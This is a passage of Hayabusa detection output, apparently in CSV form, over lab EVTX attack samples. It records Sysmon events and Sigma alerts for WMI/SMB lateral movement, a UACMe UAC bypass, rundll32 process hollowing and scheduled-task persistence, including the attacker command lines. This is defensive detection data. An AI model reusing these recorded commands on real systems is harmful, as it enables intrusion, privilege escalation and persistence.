(LAPTOP-JU4M3I0E) | Dst: 10.0.2.18:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2628 | PGUID: 747F3D96-75D1-5F8B-0000-00109EB23300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning 
Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.633 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 4864 | PGUID: 747F3D96-75D1-5F8B-0000-001061BD3300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.720 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 
747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\Administrator | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x33a8a8 | PID: 2784 | PGUID: 747F3D96-75D1-5F8B-0000-001088C23300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.822 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\WqEVwJZYOe | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 
07:53:06.755 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49676 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-726A-5F8B-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.001,technique_name=PowerShell | Cmd: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 | Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x17ed8c | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00 | Hash: SHA1=4DFA874CE545B22B3AAFF93BD143C6E463996698,MD5=661D7257C25198B973361117467616BE,SHA256=870691CFC9C98866B2AF2E7E48ED5FD5F1D14CFE0E3E9C630BC472FC0A013D0B,IMPHASH=F31CA5C7DD56008F53D4F3926CF37891",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.814 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,../hayabusa-rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.102 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: 
HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 8264 | PGUID: 23F38D93-CF1E-5F8E-C908-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.388 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.390 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.392 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx 
+2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Program Files\Internet Explorer\IEInstal.exe | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,Evas | PrivEsc,UAC Bypass Using IEInstal - File,,../hayabusa-rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.461 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\dfcc1807-03a1-4ae1-ab29-5675b285edea\consent.exe.dat | Process: C:\Program Files\Internet Explorer\IEInstal.exe | User: DESKTOP-NTSSLJD\den | PID: 8736 | PGUID: 23F38D93-CF1F-5F8E-CA08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.577 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 3760 | PGUID: 23F38D93-CF1F-5F8E-CB08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.004 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 
23F38D93-CF1F-5F8E-CC08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.090 +09:00,DESKTOP-NTSSLJD,11,info,,File Created,Path: C:\Users\den\AppData\Local\Temp\[1]consent.exe | Process: C:\Windows\explorer.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.218 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 112 | PGUID: 23F38D93-CF20-5F8E-CD08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding | LID: 0x17eca2 | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Using 
IEInstal - Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.517 +09:00,DESKTOP-NTSSLJD,7,info,Evas,Suspicious Load of Advapi31.dll,,../hayabusa-rules/sigma/image_load/image_load_susp_advapi32_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.531 +09:00,DESKTOP-NTSSLJD,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1073,technique_name=DLL Side-Loading | Image: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Company: Integrity Investment LLC | Signed: false | Signature: Unavailable | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Hash: SHA1=6298449EB38C20ABFE79C32346258BF4951C1E53,MD5=98F48037163A97285E72A2107F0336CA,SHA256=B26D892448D336EBFAB26F033457D1A2A94E3CD8FBBDA5AE0DBB09E16BE4C84E,IMPHASH=DEA061EF56E13C6D0B065E71A879D9B6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,,Process Created_Sysmon Alert,"technique_id=T1059.003,technique_name=Windows Command Shell | Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: DESKTOP-NTSSLJD\den | Parent Cmd: 
C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | LID: 0x17eca2 | PID: 9620 | PGUID: 23F38D93-CF20-5F8E-D008-000000000C00 | Hash: SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,10,high,,Process Access_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Src Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6896 | Src PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00 | Tgt PID: 9620 | Tgt PGUID: 23F38D93-CF20-5F8E-D008-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.590 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | PID: 6896 | PGUID: 23F38D93-CF20-5F8E-CE08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.731 +09:00,DESKTOP-NTSSLJD,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\S-1-5-21-2261457211-1283403626-3207602914-1001\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\system32\consent.exe | PID: 7716 | PGUID: 23F38D93-CF20-5F8E-CF08-000000000C00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.999 +09:00,DESKTOP-NTSSLJD,23,info,,Deleted File Archived,C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe | Process: C:\Windows\system32\DllHost.exe | User: DESKTOP-NTSSLJD\den | PID: 9444 | PGUID: 23F38D93-CF1F-5F8E-CC08-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:57.031 +09:00,DESKTOP-NTSSLJD,5,info,,Process Terminated,Process: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe | PID: 8712 | PGUID: 23F38D93-CF1E-5F8E-C808-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:51:01.476 +09:00,DESKTOP-NTSSLJD,22,info,,DNS Query,Query: wpad | Result: - | Process: C:\Windows\System32\svchost.exe | PID: 2428 | PGUID: 23F38D93-ABAC-5F8E-3900-000000000C00,../hayabusa-rules/hayabusa/sysmon/events/22_DNS-Query.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\wermgr.exe | Process: C:\Windows\System32\wermgr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe c:\temp\winfire.dll,DllRegisterServer | LID: 0x910e0 | PID: 5600 | PGUID: 747F3D96-659E-5F8F-0000-001064E03300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Exec,Trickbot Malware Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,low,,Process 
Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\system32\wermgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2372 | Src PGUID: 747F3D96-659B-5F8F-0000-001026C33300 | Tgt PID: 5600 | Tgt PGUID: 747F3D96-659E-5F8F-0000-001064E03300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 6748 | PGUID: 747F3D96-662E-5F8F-0000-001023353800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe | URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: ? 
| LID: 0x3e4 | PID: 8796 | PGUID: 747F3D96-51C9-5F93-0000-001010175B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:34.745 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_rar_sfx_access_check_2914968 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:34.767 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 | Process: c:\Users\Public\test.tmp | PID: 7624 | PGUID: 747F3D96-51CD-5F93-0000-001073735B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Users\Public\test.tmp | LID: 0x8a585 | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.332 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 3396 | PGUID: 747F3D96-51D0-5F93-0000-001036A15B00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create 
/f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 | LID: 0x8a585 | PID: 5572 | PGUID: 747F3D96-51D0-5F93-0000-0010B2B35B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | Process: C:\Windows\SysWOW64\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers | LID: 0x8a585 | PID: 8572 | PGUID: 747F3D96-51D0-5F93-0000-001079C05B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicius Schtasks From Env Var Folder,,../hayabusa-rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Add Scheduled Command 